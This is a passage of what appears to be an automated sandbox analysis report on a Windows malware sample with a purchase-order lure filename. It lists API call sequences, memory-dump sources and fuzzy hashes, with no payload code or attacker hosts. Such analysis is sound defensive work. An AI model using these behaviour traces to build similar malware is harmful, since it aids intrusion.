                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                        • String ID:
                        • API String ID: 3902887630-0
                        • Opcode ID: 7cf2c1506797f346c1c1b5ffdc98af83f51cb4a5c9457baed9cc914ba0bcc007
                        • Instruction ID: ceaafb1587def7491a2c64d44a43be565564627c827bba815c59a10076187bd9
                        • Opcode Fuzzy Hash: 7cf2c1506797f346c1c1b5ffdc98af83f51cb4a5c9457baed9cc914ba0bcc007
                        • Instruction Fuzzy Hash: ED214971254240BBEF169F3AEC86E7B7BECEF45710F51803EF809CA2A1DA60DC608650
                        APIs
                          • Part of subcall function 002CAF7D: GetWindowLongW.USER32(?,000000EB), ref: 002CAF8E
                        • GetWindowLongW.USER32(?,000000F0), ref: 0031DCC0
                        • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0031DCE4
                        • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0031DCFC
                        • GetSystemMetrics.USER32(00000004), ref: 0031DD24
                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,00000000,?,0030407D,00000000), ref: 0031DD42
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Window$Long$MetricsSystem
                        • String ID:
                        • API String ID: 2294984445-0
                        • Opcode ID: 808c0eb8ecebe468891cc483b4cb423e0e2eae6e85f5bd1ef1727d4ddb844c51
                        • Instruction ID: 9ee2b362642df33ed24d53c64384a1623e56ffe387ec59d412e30282f3b58788
                        • Opcode Fuzzy Hash: 808c0eb8ecebe468891cc483b4cb423e0e2eae6e85f5bd1ef1727d4ddb844c51
                        • Instruction Fuzzy Hash: CD21D872614211AFCB265F79AC84BA577A8FF4A375F110B34F936C65E0D7709890CB90
                        APIs
                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 002ECA86
                          • Part of subcall function 002B7E53: _memmove.LIBCMT ref: 002B7EB9
                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 002ECAB8
                        • __itow.LIBCMT ref: 002ECAD0
                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 002ECAF6
                        • __itow.LIBCMT ref: 002ECB07
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: MessageSend$__itow$_memmove
                        • String ID:
                        • API String ID: 2983881199-0
                        • Opcode ID: ec855ac267d555e9e14894308676ed7b3b96024384b077189ecccd145fcd780f
                        • Instruction ID: 4a9016ce4599720128af147087442923b45e904befae3e2a475404fb089eb689
                        • Opcode Fuzzy Hash: ec855ac267d555e9e14894308676ed7b3b96024384b077189ecccd145fcd780f
                        • Instruction Fuzzy Hash: FB213B72750644BBDB21EEE98C47EDE7AACDF49750F504038F905E7281D6B0CD1687A0
                        APIs
                          • Part of subcall function 002B3B1E: _wcsncpy.LIBCMT ref: 002B3B32
                        • GetFileAttributesW.KERNEL32(?,?,00000000), ref: 002F6DBA
                        • GetLastError.KERNEL32 ref: 002F6DC5
                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 002F6DD9
                        • _wcsrchr.LIBCMT ref: 002F6DFB
                          • Part of subcall function 002F6D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 002F6E31
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                        • String ID:
                        • API String ID: 3633006590-0
                        • Opcode ID: 6959808e588e32d9566319d6a3e981d110f2dd41b571f1eb0470ed86b58e8c12
                        • Instruction ID: 1d033824e5a44b7b0d1febdf1d0c845baef5f11113b886d46467c93d501f918b
                        • Opcode Fuzzy Hash: 6959808e588e32d9566319d6a3e981d110f2dd41b571f1eb0470ed86b58e8c12
                        • Instruction Fuzzy Hash: 9021EB7562131E96DB10AB74ED4EFFAB36CDF15390F200576E625C30D1EB20CDA49A50
                        APIs
                          • Part of subcall function 0030ACD3: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0030ACF5
                        • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00309160
                        • WSAGetLastError.WSOCK32(00000000), ref: 0030916F
                        • connect.WSOCK32(00000000,?,00000010), ref: 0030918B
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: ErrorLastconnectinet_addrsocket
                        • String ID:
                        • API String ID: 3701255441-0
                        • Opcode ID: 7e4bac9e9049c2c9fb03b43485e32895d1ae8233d3c88fd660539a13ea68f1a7
                        • Instruction ID: 4c2ea6e5ef4a6d4b1087d9eb27c821f69c4b5684cb527fedeedb6b49252933fa
                        • Opcode Fuzzy Hash: 7e4bac9e9049c2c9fb03b43485e32895d1ae8233d3c88fd660539a13ea68f1a7
                        • Instruction Fuzzy Hash: 98219D313102119FDB05AF68DC99F6EB7ADEF48764F05851AF916AB3E2CA70EC018B51
                        APIs
                        • IsWindow.USER32(00000000), ref: 003089CE
                        • GetForegroundWindow.USER32 ref: 003089E5
                        • GetDC.USER32(00000000), ref: 00308A21
                        • GetPixel.GDI32(00000000,?,00000003), ref: 00308A2D
                        • ReleaseDC.USER32(00000000,00000003), ref: 00308A68
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Window$ForegroundPixelRelease
                        • String ID:
                        • API String ID: 4156661090-0
                        • Opcode ID: a0f59baecfb39ee4dc57c175e4f42198ff905496e73838293623f92fa5a644d4
                        • Instruction ID: 0523655270a8e743395475d9f1eac9690b1daea82faac92f05f262922bd61e00
                        • Opcode Fuzzy Hash: a0f59baecfb39ee4dc57c175e4f42198ff905496e73838293623f92fa5a644d4
                        • Instruction Fuzzy Hash: E921A175A00204AFDB01EF75DC95AAABBF9EF48340F058478E94A97351CB70AC00CB50
                        APIs
                        • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 002CB5EB
                        • SelectObject.GDI32(?,00000000), ref: 002CB5FA
                        • BeginPath.GDI32(?), ref: 002CB611
                        • SelectObject.GDI32(?,00000000), ref: 002CB63B
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: ObjectSelect$BeginCreatePath
                        • String ID:
                        • API String ID: 3225163088-0
                        • Opcode ID: 343155dffed958b7d4d0ba4f4dd80201863f332df43e5e292a37a51a45e9364d
                        • Instruction ID: 1d141cabe2abc8c994f9f0f9365c2b95718843398b78dd817863bb5ca84b1271
                        • Opcode Fuzzy Hash: 343155dffed958b7d4d0ba4f4dd80201863f332df43e5e292a37a51a45e9364d
                        • Instruction Fuzzy Hash: A7218072820345FFDB239F19EC86BA97BEDFB04355F24026AE459A21A0C37448E1CF52
                        APIs
                        • __calloc_crt.LIBCMT ref: 002D2E81
                        • CreateThread.KERNEL32(?,?,002D2FB7,00000000,?,?), ref: 002D2EC5
                        • GetLastError.KERNEL32 ref: 002D2ECF
                        • _free.LIBCMT ref: 002D2ED8
                        • __dosmaperr.LIBCMT ref: 002D2EE3
                          • Part of subcall function 002D889E: __getptd_noexit.LIBCMT ref: 002D889E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                        • String ID:
                        • API String ID: 2664167353-0
                        • Opcode ID: 21f0132995791f51a1b314b2812e3d91093616a437778f6842aba0eae9f520bb
                        • Instruction ID: 5a311e7c254a88eccc0d928b3119f80bf140868d96595d3d4056f23e8013d975
                        • Opcode Fuzzy Hash: 21f0132995791f51a1b314b2812e3d91093616a437778f6842aba0eae9f520bb
                        • Instruction Fuzzy Hash: 39110432124306EFD721BFA5AC41DAB7BA8EF15770B10042BFA14C6391EB31DC249BA0
                        APIs
                        • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 002EB903
                        • GetLastError.KERNEL32(?,002EB3CB,?,?,?), ref: 002EB90D
                        • GetProcessHeap.KERNEL32(00000008,?,?,002EB3CB,?,?,?), ref: 002EB91C
                        • HeapAlloc.KERNEL32(00000000,?,002EB3CB,?,?,?), ref: 002EB923
                        • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 002EB93A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                        • String ID:
                        • API String ID: 842720411-0
                        • Opcode ID: 0d355020de97ff3358ec299cb0e8d7ce41f7eaaca6084714d051e5911de649e3
                        • Instruction ID: d2627465826dfaa6120d03eea67824b12d7a740b4fcedb29e93da8c982dc825d
                        • Opcode Fuzzy Hash: 0d355020de97ff3358ec299cb0e8d7ce41f7eaaca6084714d051e5911de649e3
                        • Instruction Fuzzy Hash: 44016971651249BFDB124FA6ECC9D6B3BADEF8A764F500029FA46C2260DB718C50DA60
                        APIs
                        • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 002F8371
                        • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 002F837F
                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 002F8387
                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 002F8391
                        • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 002F83CD
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: PerformanceQuery$CounterSleep$Frequency
                        • String ID:
                        • API String ID: 2833360925-0
                        • Opcode ID: a91723d02ec42874ebb117093a666ba34cd6f5ca024b0307692162de4021e142
                        • Instruction ID: 3511261154743792f67c2c2db1dc3eb5427ef7387786be028849e8c348e53280
                        • Opcode Fuzzy Hash: a91723d02ec42874ebb117093a666ba34cd6f5ca024b0307692162de4021e142
                        • Instruction Fuzzy Hash: 81012D71D1061DDBDF01AFA4ED88AEEFB7CFB08B41F0104A5E641B2160DF70956087A1
                        APIs
                        • CLSIDFromProgID.OLE32 ref: 002EA874
                        • ProgIDFromCLSID.OLE32(?,00000000), ref: 002EA88F
                        • lstrcmpiW.KERNEL32(?,00000000), ref: 002EA89D
                        • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 002EA8AD
                        • CLSIDFromString.OLE32(?,?), ref: 002EA8B9
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: From$Prog$FreeStringTasklstrcmpi
                        • String ID:
                        • API String ID: 3897988419-0
                        • Opcode ID: f9efff15e6ed5273a231eacc39f75800319399713e3e6a03e1d802985f03241f
                        • Instruction ID: a56e9749d8b79c327488a4edf5848976e2a5736abf171d0f69f1320dc42e4c12
                        • Opcode Fuzzy Hash: f9efff15e6ed5273a231eacc39f75800319399713e3e6a03e1d802985f03241f
                        • Instruction Fuzzy Hash: 8401AD76611205BFEB128F6AEC84BAABBFDEF443A1F104024F901D6210D770ED518BA2
                        APIs
                        • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 002EB7A5
                        • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 002EB7AF
                        • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 002EB7BE
                        • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 002EB7C5
                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 002EB7DB
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: HeapInformationToken$AllocErrorLastProcess
                        • String ID:
                        • API String ID: 44706859-0
                        • Opcode ID: 2d95a716a6324b52bbe6b6bdba774e34e959457347b46cc6e0d9c8ace2640ec4
                        • Instruction ID: 0f0a72e352511a47b0d4b0ced46a5ca0e45bf197c3055f1ad677203552c6a882
                        • Opcode Fuzzy Hash: 2d95a716a6324b52bbe6b6bdba774e34e959457347b46cc6e0d9c8ace2640ec4
                        • Instruction Fuzzy Hash: 7EF0AF362902456FEB120FA5ACC8E677BACFF86B55F400019F941CB150CB70DC118A60
                        APIs
                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 002EB806
                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 002EB810
                        • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 002EB81F
                        • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 002EB826
                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 002EB83C
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: HeapInformationToken$AllocErrorLastProcess
                        • String ID:
                        • API String ID: 44706859-0
                        • Opcode ID: eea2c87cfa99f4cdb9a818355810f8b43861d34bc9c228d47543ac5c7c323eb3
                        • Instruction ID: cfa7b4ca7a5f51754cd7e031c5b1677bcd454d559721c9d18cc2842548db7500
                        • Opcode Fuzzy Hash: eea2c87cfa99f4cdb9a818355810f8b43861d34bc9c228d47543ac5c7c323eb3
                        • Instruction Fuzzy Hash: 5CF04975250205AFEB225FA6FCC8E6B3B6CFF4AB64F000029F941C7250CB60DC61CA60
                        APIs
                        • GetDlgItem.USER32(?,000003E9), ref: 002EFA8F
                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 002EFAA6
                        • MessageBeep.USER32(00000000), ref: 002EFABE
                        • KillTimer.USER32(?,0000040A), ref: 002EFADA
                        • EndDialog.USER32(?,00000001), ref: 002EFAF4
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                        • String ID:
                        • API String ID: 3741023627-0
                        • Opcode ID: d686d2f6d34964ecc6c4be85bd3cbc0074acfcabf7e303392a46bd47fde17826
                        • Instruction ID: 1e199310823b1fe967f662116f3065fcb82b8507cd6d6e135085a2238378d4e7
                        • Opcode Fuzzy Hash: d686d2f6d34964ecc6c4be85bd3cbc0074acfcabf7e303392a46bd47fde17826
                        • Instruction Fuzzy Hash: 0D018631550745ABEB619F11EE8EBD677BCBF00705F440279B187A91E1DBF0A9548A40
                        APIs
                        • EndPath.GDI32(?), ref: 002CB526
                        • StrokeAndFillPath.GDI32(?,?,0032F583,00000000,?), ref: 002CB542
                        • SelectObject.GDI32(?,00000000), ref: 002CB555
                        • DeleteObject.GDI32 ref: 002CB568
                        • StrokePath.GDI32(?), ref: 002CB583
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Path$ObjectStroke$DeleteFillSelect
                        • String ID:
                        • API String ID: 2625713937-0
                        • Opcode ID: 2711e92c4aa28e5a6e252cb431f4240443e35944c61d91e24dbb383a0c3e03ce
                        • Instruction ID: 570e5b428c3862ca11fac3e66129e2cb5a22b63f19867db9637d5fb4131c2583
                        • Opcode Fuzzy Hash: 2711e92c4aa28e5a6e252cb431f4240443e35944c61d91e24dbb383a0c3e03ce
                        • Instruction Fuzzy Hash: 1CF0C432050205ABDB275F29ED49B643FE9AB01362F588258E4A9551F0C73589E6DF11
                        APIs
                        • CoInitialize.OLE32(00000000), ref: 002FFAB2
                        • CoCreateInstance.OLE32(0033DA7C,00000000,00000001,0033D8EC,?), ref: 002FFACA
                          • Part of subcall function 002BCAEE: _memmove.LIBCMT ref: 002BCB2F
                        • CoUninitialize.OLE32 ref: 002FFD2D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: CreateInitializeInstanceUninitialize_memmove
                        • String ID: .lnk
                        • API String ID: 2683427295-24824748
                        • Opcode ID: 28e2d88f0584c889eb246e500e146efd0c4b5474ad7e09f3112857ed608dfd4b
                        • Instruction ID: 69dbc99ea404daedbacbe84f2ec49e01c88cc6b197c3cca5c20f229e89b8c90a
                        • Opcode Fuzzy Hash: 28e2d88f0584c889eb246e500e146efd0c4b5474ad7e09f3112857ed608dfd4b
                        • Instruction Fuzzy Hash: 61A16B71114205AFC300EF64C891EABB7EDEF88744F50496DF1959B192EB70EA19CF92
                        APIs
                          • Part of subcall function 002F78AD: GetFullPathNameW.KERNEL32(?,00000105,?,?), ref: 002F78CB
                        • CoInitialize.OLE32(00000000), ref: 002FF04D
                        • CoCreateInstance.OLE32(0033DA7C,00000000,00000001,0033D8EC,?), ref: 002FF066
                        • CoUninitialize.OLE32 ref: 002FF083
                          • Part of subcall function 002B84A6: __swprintf.LIBCMT ref: 002B84E5
                          • Part of subcall function 002B84A6: __itow.LIBCMT ref: 002B8519
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                        • String ID: .lnk
                        • API String ID: 2126378814-24824748
                        • Opcode ID: 2659ee0880295f990a4716ef86d161880c3862792d7dcd1231233f39281d80cd
                        • Instruction ID: 0ed379f03de46158cd8d46c85fe87b4693d542f208abc3d82d2c08a6a72f1232
                        • Opcode Fuzzy Hash: 2659ee0880295f990a4716ef86d161880c3862792d7dcd1231233f39281d80cd
                        • Instruction Fuzzy Hash: A8A157356143069FC710DF14C984D6ABBE9BF88360F1489A8F99A9B3A1CB31ED45CF91
                        APIs
                        • __startOneArgErrorHandling.LIBCMT ref: 002D3F7D
                          • Part of subcall function 002DEE80: __87except.LIBCMT ref: 002DEEBB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
